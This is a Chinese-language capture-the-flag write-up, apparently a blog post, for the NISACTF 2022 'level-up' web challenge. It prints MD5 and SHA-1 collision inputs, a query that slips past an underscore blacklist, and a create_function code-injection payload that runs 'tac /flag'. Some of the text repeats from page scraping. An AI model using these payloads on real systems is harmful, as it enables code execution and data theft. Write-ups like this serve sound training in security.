[NISACTF 2022]level-up

查看源码，根据这个提示就可以反应出是需要去访问`robots.txt`这个文件

访问`level_2_1s_h3re.php`进入第二关

需要`post`进去`array1`和`array2`这两个参数，满足`md5强比较`相等

但因为存在`(string)`强制类型转换，所有不能使用数组绕过，只能进行`md5碰撞`

网上搜了一个满足条件的

M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2

M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

这里传参的时候注意要用抓包，直接网页传参没有反应Level___3.php

访问`Level___3.php`进入下一关

这和上一关差不多，只是换成了`shal`,也是不能用数组绕过

array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1

&array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

`level_level_4.php`

`get`进去`NI_SA_=txw4ever`,但`_`这个符号再黑名单中，可以选择`+`绕过

payload:`level_level_4.php?NI+SA+=txw4ever`

`55_5_55.php`

做到这里确实也是不会了，不知道`$a('',$b)`这么利用这个东西，搜了下发现需要使用`create_function`这个函数

构造payload

?a=\create_function&b=}system('tac /flag');/*

得到flag

posted @ 2022-11-01 21:25 traveller-2333 阅读(603) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

traverller-2333

[NISACTF 2022]level-up

[NISACTF 2022]level-up

查看源码，根据这个提示就可以反应出是需要去访问`robots.txt`这个文件

访问`level_2_1s_h3re.php`进入第二关

需要`post`进去`array1`和`array2`这两个参数，满足`md5强比较`相等

但因为存在`(string)`强制类型转换，所有不能使用数组绕过，只能进行`md5碰撞`

网上搜了一个满足条件的

这里传参的时候注意要用抓包，直接网页传参没有反应Level___3.php

访问`Level___3.php`进入下一关

这和上一关差不多，只是换成了`shal`,也是不能用数组绕过

`level_level_4.php`

`get`进去`NI_SA_=txw4ever`,但`_`这个符号再黑名单中，可以选择`+`绕过

payload:`level_level_4.php?NI+SA+=txw4ever`

`55_5_55.php`

做到这里确实也是不会了，不知道`$a('',$b)`这么利用这个东西，搜了下发现需要使用`create_function`这个函数

构造payload

得到flag

公告

traverller-2333

[NISACTF 2022]level-up

[NISACTF 2022]level-up

查看源码，根据这个提示就可以反应出是需要去访问robots.txt这个文件

访问level_2_1s_h3re.php进入第二关

需要post进去array1和array2这两个参数，满足md5强比较相等

但因为存在(string)强制类型转换，所有不能使用数组绕过，只能进行md5碰撞

网上搜了一个满足条件的

这里传参的时候注意要用抓包，直接网页传参没有反应Level___3.php

访问Level___3.php进入下一关

这和上一关差不多，只是换成了shal,也是不能用数组绕过

level_level_4.php

get进去NI_SA_=txw4ever,但_这个符号再黑名单中，可以选择+绕过

payload:level_level_4.php?NI+SA+=txw4ever

55_5_55.php

做到这里确实也是不会了，不知道$a('',$b)这么利用这个东西，搜了下发现需要使用create_function这个函数

构造payload

得到flag

公告

查看源码，根据这个提示就可以反应出是需要去访问`robots.txt`这个文件

访问`level_2_1s_h3re.php`进入第二关

需要`post`进去`array1`和`array2`这两个参数，满足`md5强比较`相等

但因为存在`(string)`强制类型转换，所有不能使用数组绕过，只能进行`md5碰撞`

访问`Level___3.php`进入下一关

这和上一关差不多，只是换成了`shal`,也是不能用数组绕过

`level_level_4.php`

`get`进去`NI_SA_=txw4ever`,但`_`这个符号再黑名单中，可以选择`+`绕过

payload:`level_level_4.php?NI+SA+=txw4ever`

`55_5_55.php`

做到这里确实也是不会了，不知道`$a('',$b)`这么利用这个东西，搜了下发现需要使用`create_function`这个函数